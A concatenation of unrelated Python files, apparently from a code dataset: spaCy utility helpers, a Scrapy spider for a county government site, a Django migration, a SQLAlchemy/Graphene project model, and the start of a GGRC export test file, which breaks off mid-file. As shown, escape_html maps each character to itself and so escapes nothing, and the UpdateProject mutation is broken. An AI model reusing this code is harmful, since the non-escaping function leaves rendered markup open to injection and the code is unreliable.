meta = get_model_meta(model_path)
data_dir = "%s_%s-%s" % (meta["lang"], meta["name"], meta["version"])
data_path = model_path / data_dir
if not model_path.exists():
raise IOError(Errors.E052.format(path=path2str(data_path)))
return load_model_from_path(data_path, meta, **overrides)
def get_model_meta(path):
"""Get model meta.json from a directory path and validate its contents.
path (unicode or Path): Path to model directory.
RETURNS (dict): The model's meta data.
"""
model_path = ensure_path(path)
if not model_path.exists():
raise IOError(Errors.E052.format(path=path2str(model_path)))
meta_path = model_path / "meta.json"
if not meta_path.is_file():
raise IOError(Errors.E053.format(path=meta_path))
meta = srsly.read_json(meta_path)
for setting in ["lang", "name", "version"]:
if setting not in meta or not meta[setting]:
raise ValueError(Errors.E054.format(setting=setting))
return meta
def is_package(name):
"""Check if string maps to a package installed via pip.
name (unicode): Name of package.
RETURNS (bool): True if installed package, False if not.
"""
name = name.lower() # compare package name against lowercase name
packages = pkg_resources.working_set.by_key.keys()
for package in packages:
if package.lower().replace("-", "_") == name:
return True
return False
def get_package_path(name):
"""Get the path to an installed package.
name (unicode): Package name.
RETURNS (Path): Path to installed package.
"""
name = name.lower() # use lowercase version to be safe
# Here we're importing the module just to find it. This is worryingly
# indirect, but it's otherwise very difficult to find the package.
pkg = importlib.import_module(name)
return Path(pkg.__file__).parent
def get_entry_points(key):
"""Get registered entry points from other packages for a given key, e.g.
'spacy_factories' and return them as a dictionary, keyed by name.
key (unicode): Entry point name.
RETURNS (dict): Entry points, keyed by name.
"""
result = {}
for entry_point in pkg_resources.iter_entry_points(key):
result[entry_point.name] = entry_point.load()
return result
def get_entry_point(key, value):
"""Check if registered entry point is available for a given name and
load it. Otherwise, return None.
key (unicode): Entry point name.
value (unicode): Name of entry point to load.
RETURNS: The loaded entry point or None.
"""
for entry_point in pkg_resources.iter_entry_points(key):
if entry_point.name == value:
return entry_point.load()
def is_in_jupyter():
"""Check if user is running spaCy from a Jupyter notebook by detecting the
IPython kernel. Mainly used for the displaCy visualizer.
RETURNS (bool): True if in Jupyter, False if not.
"""
# https://stackoverflow.com/a/39662359/6400719
try:
shell = get_ipython().__class__.__name__
if shell == "ZMQInteractiveShell":
return True # Jupyter notebook or qtconsole
except NameError:
return False # Probably standard Python interpreter
return False
def get_cuda_stream(require=False):
if CudaStream is None:
return None
elif isinstance(Model.ops, NumpyOps):
return None
else:
return CudaStream()
def get_async(stream, numpy_array):
if cupy is None:
return numpy_array
else:
array = cupy.ndarray(numpy_array.shape, order="C", dtype=numpy_array.dtype)
array.set(numpy_array, stream=stream)
return array
def env_opt(name, default=None):
if type(default) is float:
type_convert = float
else:
type_convert = int
if "SPACY_" + name.upper() in os.environ:
value = type_convert(os.environ["SPACY_" + name.upper()])
if _PRINT_ENV:
print(name, "=", repr(value), "via", "$SPACY_" + name.upper())
return value
elif name in os.environ:
value = type_convert(os.environ[name])
if _PRINT_ENV:
print(name, "=", repr(value), "via", "$" + name)
return value
else:
if _PRINT_ENV:
print(name, "=", repr(default), "by default")
return default
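# Usage sketch for env_opt (illustrative; the variable name and values below are
# made up, not taken from spaCy's defaults). With SPACY_BATCH_SIZE exported in
# the shell, the environment value wins and is cast with int because the
# default is an int:
#     >>> os.environ["SPACY_BATCH_SIZE"] = "256"
#     >>> env_opt("batch_size", 128)
#     256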
def read_regex(path):
path = ensure_path(path)
with path.open() as file_:
entries = file_.read().split("\n")
expression = "|".join(
["^" + re.escape(piece) for piece in entries if piece.strip()]
)
return re.compile(expression)
def compile_prefix_regex(entries):
"""Compile a sequence of prefix rules into a regex object.
entries (tuple): The prefix rules, e.g. spacy.lang.punctuation.TOKENIZER_PREFIXES.
    RETURNS (regex object): The regex object to be used for Tokenizer.prefix_search.
"""
if "(" in entries:
# Handle deprecated data
expression = "|".join(
["^" + re.escape(piece) for piece in entries if piece.strip()]
)
return re.compile(expression)
else:
expression = "|".join(["^" + piece for piece in entries if piece.strip()])
return re.compile(expression)
def compile_suffix_regex(entries):
"""Compile a sequence of suffix rules into a regex object.
entries (tuple): The suffix rules, e.g. spacy.lang.punctuation.TOKENIZER_SUFFIXES.
    RETURNS (regex object): The regex object to be used for Tokenizer.suffix_search.
"""
expression = "|".join([piece + "$" for piece in entries if piece.strip()])
return re.compile(expression)
def compile_infix_regex(entries):
"""Compile a sequence of infix rules into a regex object.
entries (tuple): The infix rules, e.g. spacy.lang.punctuation.TOKENIZER_INFIXES.
    RETURNS (regex object): The regex object to be used for Tokenizer.infix_finditer.
"""
expression = "|".join([piece for piece in entries if piece.strip()])
return re.compile(expression)
def add_lookups(default_func, *lookups):
"""Extend an attribute function with special cases. If a word is in the
lookups, the value is returned. Otherwise the previous function is used.
default_func (callable): The default function to execute.
*lookups (dict): Lookup dictionary mapping string to attribute value.
RETURNS (callable): Lexical attribute getter.
"""
# This is implemented as functools.partial instead of a closure, to allow
# pickle to work.
return functools.partial(_get_attr_unless_lookup, default_func, lookups)
def _get_attr_unless_lookup(default_func, lookups, string):
for lookup in lookups:
if string in lookup:
return lookup[string]
return default_func(string)
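# Usage sketch for add_lookups (illustrative; the getter and lookup table below
# are made up for the example). Entries found in a lookup short-circuit the
# default function:
#     >>> get_norm = add_lookups(lambda string: string.lower(), {"ca.": "circa"})
#     >>> get_norm("ca.")
#     'circa'
#     >>> get_norm("Hello")
#     'hello'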
def update_exc(base_exceptions, *addition_dicts):
"""Update and validate tokenizer exceptions. Will overwrite exceptions.
base_exceptions (dict): Base exceptions.
*addition_dicts (dict): Exceptions to add to the base dict, in order.
RETURNS (dict): Combined tokenizer exceptions.
"""
exc = dict(base_exceptions)
for additions in addition_dicts:
for orth, token_attrs in additions.items():
if not all(isinstance(attr[ORTH], unicode_) for attr in token_attrs):
raise ValueError(Errors.E055.format(key=orth, orths=token_attrs))
described_orth = "".join(attr[ORTH] for attr in token_attrs)
if orth != described_orth:
raise ValueError(Errors.E056.format(key=orth, orths=described_orth))
exc.update(additions)
exc = expand_exc(exc, "'", "’")
return exc
def expand_exc(excs, search, replace):
"""Find string in tokenizer exceptions, duplicate entry and replace string.
For example, to add additional versions with typographic apostrophes.
excs (dict): Tokenizer exceptions.
search (unicode): String to find and replace.
replace (unicode): Replacement.
RETURNS (dict): Combined tokenizer exceptions.
"""
def _fix_token(token, search, replace):
fixed = dict(token)
fixed[ORTH] = fixed[ORTH].replace(search, replace)
return fixed
new_excs = dict(excs)
for token_string, tokens in excs.items():
if search in token_string:
new_key = token_string.replace(search, replace)
new_value = [_fix_token(t, search, replace) for t in tokens]
new_excs[new_key] = new_value
return new_excs
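# Usage sketch for expand_exc (illustrative; the exception entry below is made
# up). A key containing the straight apostrophe gains a typographic-apostrophe
# twin, with the ORTH values rewritten to match:
#     >>> excs = {"don't": [{ORTH: "do"}, {ORTH: "n't"}]}
#     >>> new_excs = expand_exc(excs, "'", "’")
#     >>> assert "don't" in new_excs and "don’t" in new_excs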
def normalize_slice(length, start, stop, step=None):
if not (step is None or step == 1):
raise ValueError(Errors.E057)
if start is None:
start = 0
elif start < 0:
start += length
start = min(length, max(0, start))
if stop is None:
stop = length
elif stop < 0:
stop += length
stop = min(length, max(start, stop))
return start, stop
def minibatch(items, size=8):
"""Iterate over batches of items. `size` may be an iterator,
so that batch-size can vary on each step.
"""
if isinstance(size, int):
size_ = itertools.repeat(size)
else:
size_ = size
items = iter(items)
while True:
batch_size = next(size_)
batch = list(itertools.islice(items, int(batch_size)))
if len(batch) == 0:
break
yield list(batch)
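# Usage sketch for minibatch (illustrative values). A fixed int gives equal-size
# batches with a smaller remainder; an iterator such as compounding() varies the
# batch size on each step:
#     >>> list(minibatch(range(7), size=3))
#     [[0, 1, 2], [3, 4, 5], [6]]
#     >>> [len(b) for b in minibatch(range(20), size=compounding(2., 8., 2.))]
#     [2, 4, 8, 6]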
def compounding(start, stop, compound):
"""Yield an infinite series of compounding values. Each time the
generator is called, a value is produced by multiplying the previous
value by the compound rate.
EXAMPLE:
>>> sizes = compounding(1., 10., 1.5)
>>> assert next(sizes) == 1.
>>> assert next(sizes) == 1 * 1.5
>>> assert next(sizes) == 1.5 * 1.5
"""
def clip(value):
return max(value, stop) if (start > stop) else min(value, stop)
curr = float(start)
while True:
yield clip(curr)
curr *= compound
def stepping(start, stop, steps):
"""Yield an infinite series of values that step from a start value to a
final value over some number of steps. Each step is (stop-start)/steps.
After the final value is reached, the generator continues yielding that
value.
EXAMPLE:
>>> sizes = stepping(1., 200., 100)
>>> assert next(sizes) == 1.
    >>> assert next(sizes) == 1. + (200.-1.) / 100
>>> assert next(sizes) == 1 + (200.-1.) / 100 + (200.-1.) / 100
"""
def clip(value):
return max(value, stop) if (start > stop) else min(value, stop)
curr = float(start)
while True:
yield clip(curr)
curr += (stop - start) / steps
def decaying(start, stop, decay):
"""Yield an infinite series of linearly decaying values."""
curr = float(start)
while True:
yield max(curr, stop)
curr -= decay
def minibatch_by_words(items, size, tuples=True, count_words=len):
"""Create minibatches of a given number of words."""
if isinstance(size, int):
size_ = itertools.repeat(size)
else:
size_ = size
items = iter(items)
while True:
batch_size = next(size_)
batch = []
while batch_size >= 0:
try:
if tuples:
doc, gold = next(items)
else:
doc = next(items)
except StopIteration:
if batch:
yield batch
return
batch_size -= count_words(doc)
if tuples:
batch.append((doc, gold))
else:
batch.append(doc)
if batch:
yield batch
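# Usage sketch for minibatch_by_words (illustrative; plain strings stand in for
# Doc objects, so count_words=len counts characters instead of tokens):
#     >>> list(minibatch_by_words(["aa", "bbb", "c"], size=4, tuples=False, count_words=len))
#     [['aa', 'bbb'], ['c']]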
def itershuffle(iterable, bufsize=1000):
"""Shuffle an iterator. This works by holding `bufsize` items back
and yielding them sometime later. Obviously, this is not unbiased –
but should be good enough for batching. Larger bufsize means less bias.
From https://gist.github.com/andres-erbsen/1307752
iterable (iterable): Iterator to shuffle.
bufsize (int): Items to hold back.
YIELDS (iterable): The shuffled iterator.
"""
iterable = iter(iterable)
buf = []
try:
while True:
for i in range(random.randint(1, bufsize - len(buf))):
buf.append(next(iterable))
random.shuffle(buf)
for i in range(random.randint(1, bufsize)):
if buf:
yield buf.pop()
else:
break
except StopIteration:
random.shuffle(buf)
while buf:
yield buf.pop()
def filter_spans(spans):
"""Filter a sequence of spans and remove duplicates or overlaps. Useful for
creating named entities (where one token can only be part of one entity) or
when merging spans with `Retokenizer.merge`. When spans overlap, the (first)
longest span is preferred over shorter spans.
spans (iterable): The spans to filter.
RETURNS (list): The filtered spans.
"""
get_sort_key = lambda span: (span.end - span.start, span.start)
sorted_spans = sorted(spans, key=get_sort_key, reverse=True)
result = []
seen_tokens = set()
for span in sorted_spans:
# Check for end - 1 here because boundaries are inclusive
if span.start not in seen_tokens and span.end - 1 not in seen_tokens:
result.append(span)
seen_tokens.update(range(span.start, span.end))
result = sorted(result, key=lambda span: span.start)
return result
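# Usage sketch for filter_spans (illustrative; any object exposing .start and
# .end token indices works, so a namedtuple stands in for spaCy Span objects
# here). The longer of two overlapping spans wins:
#     >>> from collections import namedtuple
#     >>> FakeSpan = namedtuple("FakeSpan", ["start", "end"])
#     >>> filter_spans([FakeSpan(0, 3), FakeSpan(1, 2), FakeSpan(5, 6)])
#     [FakeSpan(start=0, end=3), FakeSpan(start=5, end=6)]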
def to_bytes(getters, exclude):
serialized = OrderedDict()
for key, getter in getters.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude:
serialized[key] = getter()
return srsly.msgpack_dumps(serialized)
def from_bytes(bytes_data, setters, exclude):
msg = srsly.msgpack_loads(bytes_data)
for key, setter in setters.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude and key in msg:
setter(msg[key])
return msg
def to_disk(path, writers, exclude):
path = ensure_path(path)
if not path.exists():
path.mkdir()
for key, writer in writers.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude:
writer(path / key)
return path
def from_disk(path, readers, exclude):
path = ensure_path(path)
for key, reader in readers.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude:
reader(path / key)
return path
def minify_html(html):
"""Perform a template-specific, rudimentary HTML minification for displaCy.
Disclaimer: NOT a general-purpose solution, only removes indentation and
newlines.
html (unicode): Markup to minify.
RETURNS (unicode): "Minified" HTML.
"""
    return html.strip().replace("    ", "").replace("\n", "")
def escape_html(text):
"""Replace <, >, &, " with their HTML encoded representation. Intended to
prevent HTML errors in rendered displaCy markup.
text (unicode): The original text.
RETURNS (unicode): Equivalent text to be safely used within HTML.
"""
text = text.replace("&", "&")
text = text.replace("<", "<")
text = text.replace(">", ">")
text = text.replace('"', """)
return text
def use_gpu(gpu_id):
try:
import cupy.cuda.device
except ImportError:
return None
from thinc.neural.ops import CupyOps
device = cupy.cuda.device.Device(gpu_id)
device.use()
Model.ops = CupyOps()
Model.Ops = CupyOps
return device
def fix_random_seed(seed=0):
random.seed(seed)
numpy.random.seed(seed)
if cupy is not None:
cupy.random.seed(seed)
def get_json_validator(schema):
# We're using a helper function here to make it easier to change the
# validator that's used (e.g. different draft implementation), without
# having to change it all across the codebase.
# TODO: replace with (stable) Draft6Validator, if available
if jsonschema is None:
raise ValueError(Errors.E136)
return jsonschema.Draft4Validator(schema)
def validate_schema(schema):
"""Validate a given schema. This just checks if the schema itself is valid."""
validator = get_json_validator(schema)
validator.check_schema(schema)
def validate_json(data, validator):
"""Validate data against a given JSON schema (see https://json-schema.org).
data: JSON-serializable data to validate.
validator (jsonschema.DraftXValidator): The validator.
RETURNS (list): A list of error messages, if available.
"""
errors = []
for err in sorted(validator.iter_errors(data), key=lambda e: e.path):
if err.path:
err_path = "[{}]".format(" -> ".join([str(p) for p in err.path]))
else:
err_path = ""
msg = err.message + " " + err_path
if err.context: # Error has suberrors, e.g. if schema uses anyOf
suberrs = [" - {}".format(suberr.message) for suberr in err.context]
msg += ":\n{}".format("".join(suberrs))
errors.append(msg)
return errors
def get_serialization_exclude(serializers, exclude, kwargs):
"""Helper function to validate serialization args and manage transition from
keyword arguments (pre v2.1) to exclude argument.
"""
exclude = list(exclude)
# Split to support file names like meta.json
options = [name.split(".")[0] for name in serializers]
for key, value in kwargs.items():
if key in ("vocab",) and value is False:
deprecation_warning(Warnings.W015.format(arg=key))
exclude.append(key)
elif key.split(".")[0] in options:
raise ValueError(Errors.E128.format(arg=key))
# TODO: user warning?
return exclude
class SimpleFrozenDict(dict):
"""Simplified implementation of a frozen dict, mainly used as default
function or method argument (for arguments that should default to empty
dictionary). Will raise an error if user or spaCy attempts to add to dict.
"""
def __setitem__(self, key, value):
raise NotImplementedError(Errors.E095)
def pop(self, key, default=None):
raise NotImplementedError(Errors.E095)
def update(self, other):
raise NotImplementedError(Errors.E095)
class DummyTokenizer(object):
# add dummy methods for to_bytes, from_bytes, to_disk and from_disk to
# allow serialization (see #1557)
def to_bytes(self, **kwargs):
return b""
def from_bytes(self, _bytes_data, **kwargs):
return self
def to_disk(self, _path, **kwargs):
return None
def from_disk(self, _path, **kwargs):
return self
|
py | 1a40bcb2de40131281f6c7e6172442bf7720b5c8 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..utils import extract_CN_from_content
from ..items import ScrapySpiderItem
import re
class A456Spider(CrawlSpider):
name = '456'
allowed_domains = ['yongshou.gov.cn']
start_urls = ['http://www.yongshou.gov.cn/html/zwgk/xxgkml/czxx/czxx/index.html']
rules = (
Rule(LinkExtractor(allow=r'/news_list\.rt\?channlId=\d+'), follow=True),
Rule(LinkExtractor(allow=r'/html/zwgk/xxgkml/[a-z]+/index.html'), follow=True),
Rule(LinkExtractor(allow=r'/html/[a-z]+/[a-z]+/\d+/\d+\.html'), callback='parse_item_1', follow=True),
Rule(LinkExtractor(allow=r'/news_list\.rt\?channlId=\d+&pageNo=\d+'), follow=True),
# Rule(LinkExtractor(allow=r'/html/[a-z]+/[a-z]+/[a-z]+/[a-z]+/\d+/\d+\.html'), callback='parse_item', follow=True),
Rule(LinkExtractor(allow=r'/html/zwgk/xxgkml/[a-z]+/\d+/\d+\.html'), callback='parse_item', follow=True),
# Rule(LinkExtractor(allow=r'/news_list\.rt\?channlCid=.*pageNo=\d+'), follow=True),
Rule(LinkExtractor(allow=r'/news_list\.rt\?channlCid=\d+&channlId=\d+&pageNo=\d+'), follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
)
def parse_item(self, response):
# print("############### ", response.url)
item = ScrapySpiderItem()
item['url'] = response.url
date = response.xpath('/html/body/div[5]/div/div[1]/table/tr[2]/td[6]').extract_first()
date = re.search(r"(\d{4}-\d{2}-\d{2})", date).groups()[0]
item['date'] = date
title = response.xpath('//div[@class="zwgkdetailpart2_bt"]/h1/text()').extract_first()
item['title'] = title
contents = response.xpath('//div[@class="zwgkdetailpart2_nr"]').extract()
item['contents'] = extract_CN_from_content(contents)
return item
def parse_item_1(self, response):
# print("!!!!!!!!!!!!!!!!!! ", response.url)
item = ScrapySpiderItem()
item['url'] = response.url
date = response.xpath('//div[@class="newdetailpart_fbsj"]/span[1]').extract_first()
date = re.search(r"(\d{4}-\d{2}-\d{2})", date).groups()[0]
item['date'] = date
title = response.xpath('//div[@class="newdetailpart_bt"]/h1/text()').extract_first()
item['title'] = title
contents = response.xpath('//div[@class="newdetailpart_nr"]').extract()
item['contents'] = extract_CN_from_content(contents)
return item
|
py | 1a40bd1a8ff83500163cad3816b37a738a521256 | # Generated by Django 3.2.8 on 2021-11-03 23:44
import django.contrib.postgres.fields
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
import apps.configattribute.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ConfigAttributeName',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, unique=True, validators=[apps.configattribute.models.validate_config_name])),
('description', models.TextField(blank=True, null=True)),
('tags', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=24), blank=True, default=list, size=None)),
('created_on', models.DateTimeField(auto_now_add=True, verbose_name='created_on')),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Configuration Attribute Name',
'verbose_name_plural': 'Configuration Attribute Names',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='ConfigAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('target', models.CharField(max_length=64, validators=[apps.configattribute.models.validate_config])),
('data', models.JSONField(blank=True, null=True)),
('updated_on', models.DateTimeField(auto_now=True, verbose_name='update_on')),
('name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='configattribute.configattributename')),
('updated_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Configuration Attribute',
'verbose_name_plural': 'Configuration Attributes',
'ordering': ['target', 'name'],
'unique_together': {('target', 'name')},
},
),
]
|
py | 1a40bd2f2f77ba0cf018d1d049844719d1e8fd3c |
# NOTE: the imports below are a best-guess reconstruction; this module expects a
# Flask-SQLAlchemy `db` instance defined elsewhere in the application, and the
# `from app import db` line is only an assumption about where that instance lives.
import graphene
from graphene_sqlalchemy import SQLAlchemyObjectType
from sqlalchemy.dialects.postgresql import UUID
from app import db  # assumed: the application module exposing db = SQLAlchemy(app)


class Project(db.Model):
__tablename__ = 'project'
id = db.Column(UUID, primary_key=True)
c_project_id = db.Column(db.String(255))
project_name = db.Column(db.String(255))
signature_date = db.Column(db.DateTime(255))
service_commencement = db.Column(db.DateTime(255))
contract_duration_month = db.Column(db.Integer)
contract_value_usd = db.Column('contract value_usd', db.Numeric)
projected_margin_usd = db.Column(db.Numeric)
component_of_bespoke = db.Column(db.Integer)
often_provide_services = db.Column(db.Integer)
is_transition_plan = db.Column(db.Integer)
transition_plan_date = db.Column(db.DateTime(255))
is_transition_charges = db.Column(db.Integer)
transition_charges = db.Column(db.Numeric)
milestones = db.Column(db.Integer)
payment_milestones = db.Column(db.Integer)
service_credit_cap = db.Column(db.Integer)
is_transformation_plan = db.Column(db.Integer)
transformation_plan_start = db.Column(db.DateTime(255))
transformation_plan_end = db.Column(db.DateTime(255))
is_earn_back = db.Column(db.Integer)
is_customer_satisfaction_report = db.Column(db.Integer)
customer_satisfaction_form = db.Column(db.Integer)
governance_type = db.Column(db.Integer)
governance_often = db.Column(db.Integer)
key_personnel = db.Column(db.Integer)
supplier_personnel = db.Column(db.Integer)
customer_personnel = db.Column(db.Integer)
planned_negotiation_month = db.Column(db.Integer)
negotiations_month = db.Column(db.Integer)
sole_sourced = db.Column(db.Integer)
proposed_period_weeks = db.Column(db.Integer)
actual_period_weeks = db.Column(db.Integer)
is_due_diligence_completed = db.Column(db.Integer)
agreement_party = db.Column('agreement party', db.Integer)
type_of_service = db.Column(db.Integer)
currency = db.Column(db.Integer)
service_credit_cap_type = db.Column(db.Integer)
service_level_cap_percentage = db.Column(db.Numeric)
CREATED_BY = db.Column(UUID)
UPDATED_BY = db.Column(UUID)
UPDATED_AT = db.Column(db.DateTime, server_default=db.func.now())
CREATED_AT = db.Column(
db.DateTime, server_default=db.func.now(), server_onupdate=db.func.now())
class ProjectObject(SQLAlchemyObjectType):
class Meta:
model = Project
interfaces = (graphene.relay.Node, )
class ProjectInput(graphene.InputObjectType):
c_project_id = graphene.String()
project_name = graphene.String()
signature_date = graphene.types.datetime.DateTime()
service_commencement = graphene.types.datetime.DateTime()
contract_duration_month = graphene.Int()
contract_value_usd = graphene.Float()
projected_margin = graphene.Float()
component_of_bespoke = graphene.Int()
often_provide_services = graphene.Int()
is_transition_plan = graphene.Int()
transition_plan_date = graphene.types.datetime.DateTime()
is_transition_charges = graphene.Int()
transition_charges = graphene.Float()
is_transformation_plan = graphene.Int()
transformation_plan_start = graphene.types.datetime.DateTime()
transformation_plan_end = graphene.types.datetime.DateTime()
service_credit_cap = graphene.Int()
is_earn_back = graphene.Int()
is_customer_satisfaction_report = graphene.Int()
customer_satisfaction_form = graphene.Int()
governance_type = graphene.Int()
governance_often = graphene.Int()
key_personnel = graphene.Int()
supplier_personnel = graphene.Int()
customer_personnel = graphene.Int()
planned_negotiation_month = graphene.Int()
negotiations_month = graphene.Int()
sole_sourced = graphene.Int()
proposed_period_weeks = graphene.Int()
actual_period_weeks = graphene.Int()
is_due_diligence_completed = graphene.Int()
agreement_party = graphene.Int()
type_of_service = graphene.Int()
currency = graphene.Int()
service_levels_with_credit = graphene.Int()
service_level_without_credit = graphene.Int()
service_level_cap_percentage = graphene.Int()
service_credit_cap_type = graphene.Int()
class CreateProject(graphene.Mutation):
class Arguments:
project_data = ProjectInput()
ok = graphene.Boolean()
project = graphene.Field(ProjectObject)
def mutate(root, info, project_data=None):
project = Project(
c_project_id=project_data.c_project_id, project_name = project_data.project_name, signature_date=project_data.signature_date, service_commencement=project_data.service_commencement, contract_duration_month=project_data.contract_duration_month, contract_value_usd=project_data.contract_value_usd, projected_margin=project_data.projected_margin, often_provide_services=project_data.often_provide_services, is_transition_plan=project_data.is_transition_plan,
transition_plan_date=project_data.transition_plan_date,
is_transition_charges=project_data.is_transition_charges,
transition_charges=project_data.transition_charges, is_transformation_plan=project_data.is_transformation_plan, transformation_plan_start=project_data.transformation_plan_start, transformation_plan_end=project_data.transformation_plan_end, is_earn_back=project_data.is_earn_back, is_customer_satisfaction_report=project_data.is_customer_satisfaction_report, service_level_without_credit=project_data.service_level_without_credit, service_levels_with_credit=project_data.service_levels_with_credit, service_credit_cap_type=project_data.service_credit_cap_type, customer_satisfaction_form=project_data.customer_satisfaction_form, governance_type=project_data.governance_type, governance_often=project_data.governance_often, key_personnel=project_data.key_personnel, supplier_personnel=project_data.supplier_personnel, customer_personnel=project_data.customer_personnel, planned_negotiation_month=project_data.planned_negotiation_month, negotiations_month=project_data.negotiations_month, sole_sourced=project_data.sole_sourced, proposed_period_weeks=project_data.proposed_period_weeks, actual_period_weeks=project_data.actual_period_weeks, is_due_diligence_completed=project_data.is_due_diligence_completed, agreement_party = project_data.agreement_party, type_of_service = project_data.type_of_service, currency = project_data.currency, service_level_cap_percentage = project_data.service_level_cap_percentage, service_credit_cap_type = project_data.service_credit_cap_type
)
db.session.add(project)
db.session.commit()
ok = True
return CreateProject(project=project, ok=ok)
# def input_to_dictionary(input):
# """Method to convert Graphene inputs into dictionary"""
# dictionary = {}
# for key in input:
# # Convert GraphQL global id to database id
# if key[-2:] == 'id':
# input[key] = from_global_id(input[key])[1]
# dictionary[key] = input[key]
# return dictionary
from graphql_relay.node.node import from_global_id
class UpdateProjectInput(graphene.InputObjectType, ProjectInput):
id = graphene.ID(required = True)
class UpdateProject(graphene.Mutation):
project_data = UpdateProjectInput()
ok = graphene.Boolean()
project = graphene.Field(ProjectObject)
def mutate(root, info, project_data=None):
project = Project(
c_project_id=project_data.c_project_id, project_name = project_data.project_name, signature_date=project_data.signature_date, service_commencement=project_data.service_commencement, contract_duration_month=project_data.contract_duration_month, contract_value_usd=project_data.contract_value_usd, projected_margin=project_data.projected_margin, often_provide_services=project_data.often_provide_services, is_transition_plan=project_data.is_transition_plan,
transition_plan_date=project_data.transition_plan_date,
is_transition_charges=project_data.is_transition_charges,
transition_charges=project_data.transition_charges, is_transformation_plan=project_data.is_transformation_plan, transformation_plan_start=project_data.transformation_plan_start, transformation_plan_end=project_data.transformation_plan_end, is_earn_back=project_data.is_earn_back, is_customer_satisfaction_report=project_data.is_customer_satisfaction_report, service_levels_with_credit=project_data.service_levels_with_credit, service_level_without_credit=project_data.service_level_without_credit, service_credit_cap_type=project_data.service_credit_cap_type, customer_satisfaction_form=project_data.customer_satisfaction_form, governance_type=project_data.governance_type, governance_often=project_data.governance_often, key_personnel=project_data.key_personnel, supplier_personnel=project_data.supplier_personnel, customer_personnel=project_data.customer_personnel, planned_negotiation_month=project_data.planned_negotiation_month, negotiations_month=project_data.negotiations_month, sole_sourced=project_data.sole_sourced, proposed_period_weeks=project_data.proposed_period_weeks, actual_period_weeks=project_data.actual_period_weeks, is_due_diligence_completed=project_data.is_due_diligence_completed, agreement_party = project_data.agreement_party, type_of_service = project_data.type_of_service, currency = project_data.currency, service_level_cap_percentage = project_data.service_level_cap_percentage, service_credit_cap_type = project_data.service_credit_cap_type
)
db.session.update(project)
db.session.commit()
ok = True
return UpdateProject(project=project, ok=ok)
|
py | 1a40beee3a73572c1814398a45a0af360e94739b | # Copyright (C) 2018 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests for workflow object exports."""
from os.path import abspath, dirname, join
from flask.json import dumps
from ggrc import db
from ggrc.app import app # NOQA # pylint: disable=unused-import
from ggrc_workflows.models import Workflow, TaskGroup
from integration.ggrc import TestCase
from integration.ggrc_workflows.generator import WorkflowsGenerator
THIS_ABS_PATH = abspath(dirname(__file__))
CSV_DIR = join(THIS_ABS_PATH, 'test_csvs/')
class TestExportEmptyTemplate(TestCase):
"""Test empty export for all workflow object types."""
def setUp(self):
self.client.get("/login")
self.headers = {
'Content-Type': 'application/json',
"X-Requested-By": "GGRC",
"X-export-view": "blocks",
}
def test_single_object_export(self):
"""Test empty exports for workflow only."""
data = {
"export_to": "csv",
"objects": [{"object_name": "Workflow", "fields": "all"}]
}
response = self.client.post("/_service/export_csv",
data=dumps(data), headers=self.headers)
self.assertEqual(response.status_code, 200)
self.assertIn("Title*", response.data)
def test_multiple_objects(self):
"""Test empty exports for all workflow object in one query."""
data = [
{"object_name": "Workflow", "fields": "all"},
{"object_name": "TaskGroup", "fields": "all"},
{"object_name": "TaskGroupTask", "fields": "all"},
{"object_name": "Cycle", "fields": "all"},
{"object_name": "CycleTaskGroup", "fields": "all"},
{"object_name": "CycleTaskGroupObjectTask", "fields": "all"},
]
request_body = {
"export_to": "csv",
"objects": data
}
response = self.client.post("/_service/export_csv",
data=dumps(request_body), headers=self.headers)
self.assertEqual(response.status_code, 200)
self.assertIn("Workflow,", response.data)
self.assertIn("Task Group,", response.data)
self.assertIn("Task,", response.data)
self.assertIn("Cycle,", response.data)
self.assertIn("Cycle Task Group,", response.data)
self.assertIn("Cycle Task,", response.data)
class TestExportMultipleObjects(TestCase):
""" Test data is found in the google sheet:
https://docs.google.com/spreadsheets/d/1Jg8jum2eQfvR3kZNVYbVKizWIGZXvfqv3yQpo2rIiD8/edit#gid=2035742544
"""
CSV_DIR = join(abspath(dirname(__file__)), "test_csvs/")
def activate(self):
""" activate workflows just once after the class has been initialized
This should be in setUpClass method, but we can't access the server
context from there."""
gen = WorkflowsGenerator()
# generate cycle for the only one time wf
wf1 = Workflow.query.filter_by(status="Draft", slug="wf-1").first()
if wf1:
gen.generate_cycle(wf1)
# Only workflows with at least one task group could be activated
workflows = db.session.query(Workflow).join(TaskGroup).filter(
Workflow.id == TaskGroup.workflow_id,
Workflow.status == 'Draft').all()
for workflow in workflows:
gen.activate_workflow(workflow)
def setUp(self):
self.clear_data()
    # TODO: use a CSV here that has no errors or warnings
self.import_file("workflow_big_sheet.csv", safe=False)
self.client.get("/login")
self.headers = {
'Content-Type': 'application/json',
"X-Requested-By": "GGRC",
"X-export-view": "blocks",
}
self.activate()
def export_csv(self, data):
response = super(TestExportMultipleObjects, self).export_csv(data)
self.assert200(response)
return response
def test_workflow_task_group_mapping(self):
""" test workflow and task group mappings """
data = [
{
"object_name": "Workflow", # wf-1
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "TaskGroup",
"slugs": ["tg-1"],
},
},
"fields": "all",
}, {
